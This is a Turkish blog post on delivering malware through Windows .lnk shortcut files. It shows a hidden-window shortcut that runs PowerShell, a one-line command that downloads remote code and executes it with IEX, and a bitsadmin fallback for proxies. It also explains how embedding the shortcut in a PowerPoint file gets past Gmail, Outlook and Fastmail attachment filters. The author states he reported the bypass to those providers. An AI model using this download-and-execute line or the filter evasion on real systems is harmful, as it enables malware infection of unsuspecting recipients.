Merhaba,
Lnk uzantılı dosyalar ile farklı yöntemler kullanarak zararlı yazılım bulaştırılabildiği bilinen bir gerçek. Lnk içinden Powershell scriptlerinin çağrılması, Zip içeriğine .lnk dosya yerleştirmesi bunlara örnek verilebilir. Ayrıca .lnk dosyalarının simgelerini değiştirebildiğimiz için sosyal mühendislik çalışmalarında da aktif bir şekilde kullanılmakta olduğunu biliyoruz.
Bu yazıda ise .lnk dosyalarını kullanarak “az bilinen” olarak tanımlanan bazı zararlı yazılım bulaştırma tekniklerini inceleyeceğiz. Basit bir örnekle başlayalım. Kısayol dosyası içinden calc.exe dosyasını çalıştıralım. Aşağıdaki kodu kısayol olarak belirliyoruz.
Powershell.exe calc.exe
Görüldüğü gibi calc.exe uygulaması çalıştığında cmd penceresi bir kaç saniyelikte olsa açılıp kapandı. Biraz daha az dikkat çekmek adına uygulamanın ayarlarında Şekil-1'de gösterildiği gibi basit bir düzenleme yapalım.
Bu düzenleme sayesinde .exe dosyası çalıştığında hiçbir pencere açılmayacak ve .exe bu şekilde çalışmış olacak.
Şekil-1 Dosyanın gizlenmesi.(Minimized)
Pencereyi başarılı bir şekilde gizlediğimize göre Powershell üzerinden çalışmamıza devam ediyoruz. Şimdi, powershell.exe sayesinde dış ağdan dosya indirip çalıştırmayı deneyeceğiz.
Powershell ile dış ağdan dosya indirmek için aşağıdaki komutu kullanabiliriz:
powershell "IEX (New-Object Net.WebClient).DownloadString('HOST');"
Powershell'in download özelliğini kullanarak bunu yapmak oldukça kolay fakat önümüzde şöyle bir problem de var. Bilinen en basit örneğin proxy nedeniyle hata verme olasılığı. Bunu aşmak için windows işletim sisteminde bulunan bitsadmin'i kullanabiliriz.
Diğer sorunlardan bir tanesi de oluşturduğunuz dosyanın kısayolu için 255 karakter sınırı olması. Çok büyük bir saldırı vektörü ile kısayol hazırlayıp kullanamıyoruz fakat zararlı yazılımın gövdesini internetten indirip çalıştırabiliriz.
Buraya kadar her şey güzel fakat dosyayı Gmail üzerinden aldığımız ya da gönderdiğimiz zaman uyarı vermeye başlayacak.
Şekil - 2 .lnk uzantılı dosyaların engellenmesi
Bunu aşmak için zararlı yazılımı zipliyoruz; fakat yine Gmail uyarı verdi. ( Bu örneği antivirüs koruması olan herhangi bir mail hizmeti içinde düşünebiliriz..)
Bunu aşmak için zararlı yazılımı zipliyoruz; fakat yine Gmail uyarı verdi. ( Bu örneği antivirüs koruması olan herhangi bir mail hizmeti içinde düşünebiliriz..)
Şekil - 3 .lnk+zip uzantılı dosyaların engellenmesi
Korumaya takıldık ve elimizde son olarak .lnk + powershell + bitsadmin var. Gmail'in kullanmış olduğu antivirüs korumasını aşmak için ufak bir hile yapacağız. Boş bir powerpoint sunumu açıyoruz ve içine daha önce hazırlamış olduğumuz .lnk dosyasını taşıyoruz. Bu şekilde, lnk dosyasını engelleyen koruma mekanizmalarını basit bir şekilde atlatabiliyoruz.
Şekil - 4 Powerpoint sunumu içerisinde .lnk dosyası
Şekil - 5 .lnk+powerpoint dosyası
Son olarak, az bilinen bu hileyi Gmail, Outlook ve Fastmail gibi mail hizmetlerinin güvenlik birimlerine bildirdim Sonuçlarını aşağıda paylaşıyorum.
Son olarak, az bilinen bu hileyi Gmail, Outlook ve Fastmail gibi mail hizmetlerinin güvenlik birimlerine bildirdim Sonuçlarını aşağıda paylaşıyorum.
Şekil - 6 Gmail
Şekil - 7 Outlook
Şekil - 7 Outlook
Şekil - 8 Fastmail
Bu araştırma boyunca bir çok yabancı makale inceledim fakat bu konuya özel detaylı bir anlatımla karşılaşmadım malesef. Yazı içeriğiyle ilgili daha fazla okuma yapmak adına, bildiğiniz kaynakları burada yorum olarak veya sosyal ağlarda paylaşırsanız çok sevinirim.
Düzenleme :
Bu konuda bir araştırma yapılmış.
http://onready.me/old_horse_attacks.html
http://onready.me/lnk_in_docx.html
Düzenleme :
Bu konuda bir araştırma yapılmış.
http://onready.me/old_horse_attacks.html
http://onready.me/lnk_in_docx.html
Evren
Not: Bu yazı eğitim amaçlıdır. Oluşabilecek zarar ve hasarlar tamamen uygulayıcıya aittir, sitemiz ve yazarlar sorumlu değildir.
Not: Bu yazı eğitim amaçlıdır. Oluşabilecek zarar ve hasarlar tamamen uygulayıcıya aittir, sitemiz ve yazarlar sorumlu değildir.